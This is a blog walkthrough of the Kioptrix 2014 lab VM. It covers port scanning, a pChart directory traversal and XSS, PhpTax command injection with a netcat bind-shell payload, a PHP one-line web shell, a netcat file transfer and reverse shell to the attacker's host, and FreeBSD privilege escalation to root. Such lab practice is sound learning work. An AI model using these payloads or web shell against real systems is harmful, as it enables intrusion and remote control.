靶场练习 - Kioptrix5

avatar

gddFeng

Gubba nub nub doo rahkah.
文章 评论 标签
57 0 6
最新回复
随便看看
2024 年 05 月 05 日
【OSCP官方视频】七、主动式信息收集
2024 年 04 月 30 日
靶场练习 - Violate:1
2024 年 02 月 05 日
HTB-Meow题解
首页
/ 渗透测试 / 正文

靶场搭建

下载:https://download.vulnhub.com/kioptrix/kiop2014.tar.bz2

添加一张NAT模式的网卡,IP地址:192.168.74.137

信息收集

nmap

快速全端口探测

┌──(root㉿kali)-[~]
└─# nmap 192.168.74.137 -p-          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 09:50 EDT
Nmap scan report for 192.168.74.137
Host is up (0.00032s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
8080/tcp open   http-proxy
MAC Address: 00:0C:29:07:5D:F9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 104.77 seconds

针对这三个端口进一步探测

┌──(root㉿kali)-[~]
└─# nmap 192.168.74.137 -p 22,80,8080 -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 09:53 EDT
Nmap scan report for 192.168.74.137
Host is up (0.00040s latency).

PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:07:5D:F9 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.85 seconds

22端口是关闭的,但是还是探测得到,估计是8080端口代理进行的

80页面

打开瞅了一眼80端口,在源代码中看到了提示

<head>
  <!--
  <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
  -->
 </head>

看到有pChart,搜一下有没有漏洞

┌──(root㉿kali)-[~]
└─# searchsploit pchart                                 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                            |  Path
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
pChart 2.1.3 - Multiple Vulnerabilities                                                                                                                                   | php/webapps/31173.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

还真有

汇总

  • pChart2.1.3漏洞
  • Apache2.2.21
  • ssh暴力破解
  • http代理(可能是reGeorge

漏洞利用

pChart

查看漏洞:

┌──(root㉿kali)-[~/Desktop]
└─# cat 31173.txt 
# Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS
# Date: 2014-01-24
# Exploit Author: Balazs Makany
# Vendor Homepage: www.pchart.net
# Software Link: www.pchart.net/download
# Google Dork: intitle:"pChart 2.x - examples" intext:"2.1.3"
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A

[0] Summary:
PHP library pChart 2.1.3 (and possibly previous versions) by default
contains an examples folder, where the application is vulnerable to
Directory Traversal and Cross-Site Scripting (XSS).
It is plausible that custom built production code contains similar
problems if the usage of the library was copied from the examples.
The exploit author engaged the vendor before publicly disclosing the
vulnerability and consequently the vendor released an official fix
before the vulnerability was published.


[1] Directory Traversal:
"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"
The traversal is executed with the web server's privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server's configuration.
This problem may exists in the production code if the example code was
copied into the production environment.

Directory Traversal remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.


[2] Cross-Site Scripting (XSS):
"hxxp://localhost/examples/sandbox/script/session.php?<script>alert('XSS')</script>
This file uses multiple variables throughout the session, and most of
them are vulnerable to XSS attacks. Certain parameters are persistent
throughout the session and therefore persists until the user session
is active. The parameters are unfiltered.

Cross-Site Scripting remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.


[3] Disclosure timeline:
2014 January 16 - Vulnerability confirmed, vendor contacted
2014 January 17 - Vendor replied, responsible disclosure was orchestrated
2014 January 24 - Vendor was inquired about progress, vendor replied
and noted that the official patch is released.

看一下具体的漏洞位置,发现是任意文件读取:http://192.168.74.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

就读到了文件

还有一个XSS,没啥太大意义

那么现在手里面只有一个文件包含的漏洞,要想办法组合收集更多的信息,通过LFI去找信息

目前明确知道机器上运行着apache,那就去查看配置文件:http://192.168.74.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>



</VirtualHost>


Include etc/apache22/Includes/*.conf

看到8080端口需要通过Mozilla4_browser进行访问

┌──(root㉿kali)-[~]
└─# curl -H "User-Agent:Mozilla/4.0" http://192.168.74.137:8080
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
<ul><li><a href="phptax/"> phptax/</a></li>
</ul>
</body></html>

看到有一个phptax的目录,瞧一眼呢

`terminal ┌──(root㉿kali)-[~]
└─# curl -H "User-Agent:Mozilla/4.0" http://192.168.74.137:8080/phptax/


出来一堆组件,这个phptax估计是个CMS,直接搜一下攻击模块

msf6 > search phptax

Matching Modules

# Name Disclosure Date Rank Check Description

  • exploit/multi/http/phptax_exec 2012-10-08 excellent Yes PhpTax pfilez Parameter Exec Remote Code Injection

Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/phptax_exec


### phptax

msf直接利用没有合适的payload,这就很傻逼了

searchsploit查了一下有记录,是有一个RCE

drawimage.php, line 63:

include ("./files/$_GET[pfilez]");

// makes a png image
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");

Exploit / Proof of Concept:

Bindshell on port 23235 using netcat:

http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

Exploit-DB Verified:
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make


可以看到在pfilez参数有RCE,通过`;`可以将语句闭合进行执行,给出了Exp,但是尝试了一下没有办法直接使用,查阅了资料,发现了原因

> NC 的 FreeBSD 版本没有附带 execute 选项,这意味着我无法用它获得反向 shell。
> 参考:https://blog.techorganic.com/2014/04/08/kioptrix-hacking-challenge-part-5/

那么想法自然而然就是上传一个shell去运行,最简单的就是上传一个一句话:`http://192.168.74.137:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php echo system($_GET["cmd"]) ?>' > 1.php;&pdf=make`

可以执行系统命令了

wget目标机器不存在,但是存在nc,尝试通过nc传递数据

监听请求

┌──(root㉿kali)-[~]
└─# nc -l -p 8888 < shell.php

监听回弹

┌──(root㉿kali)-[~]
└─# nc -lvp 1234


RCE:`http://192.168.74.137:8080/phptax/1.php?cmd=nc 192.168.74.129 8888 > shell.php`

写入shell.php之后直接访问执行,就会回弹shell

┌──(root㉿kali)-[~]
└─# nc -lvp 1234
listening on [any] 1234 ...
Warning: forward host lookup failed for bogon: Unknown host
connect to [192.168.74.129] from bogon [192.168.74.137] 19685
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
3:03AM up 2:26, 0 users, load averages: 0.11, 0.11, 0.04
USER TTY FROM LOGIN@ IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off
$ whoami
www


但是低权限,要提权

### 提权

`uname -a`查看一下机器的内核,发现是`FreeBSD 9.0`,直接searchsploit搜一下看看有没有提权脚本,有的,直接传上去,通过他机器上的gcc编译出来

`http://192.168.74.137:8080/phptax/1.php?cmd=nc%20192.168.74.129%208888%20%3E%2028718.c`

`http://192.168.74.137:8080/phptax/1.php?cmd=gcc%20-o%20exploit%2028718.c`

`28718.c`这个提权的方法在目标机器上编译的时候我这里出现了问题,所以我用了另外一个`26368.c`

传上去之后直接gcc编译,运行`a.out`就直接拿到了root权限

$ gcc exp.c
exp.c:89:2: warning: no newline at end of file
$ ./a.out
whoami
root


## 小结

出现了很多次意想不到的情况,自己心里想的方法总是不能如鱼得水的应用,在拿到一句话后,想要反弹shell,但是由于对工具的不熟悉以及反弹方式底层逻辑的缺失导致浪费了大量时间,目标机器没有wget后就不知道该如何进行传递,常用的工具应用的并不像自己认为的那样熟练,还是要加强练习。

一些具体的失败原因仍然没有能力刨根问题,例如提权的过程中为什么`28718.c`编译后无法运行?反弹shell的过程中,为什么有很多次没有正常进行会话。这些都需要对操作系统层面和工具的设计以及网络通讯基础具有深刻的理解才能解答。
靶场渗透
版权属于:gddFeng
本文链接:https://blog.gddfeng.com/archives/41/
作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可
靶场练习 - Kioptrix4
« 上一篇
靶场练习 - FRISTILEAKS: 1.3
下一篇 »
评论区
头像
文章目录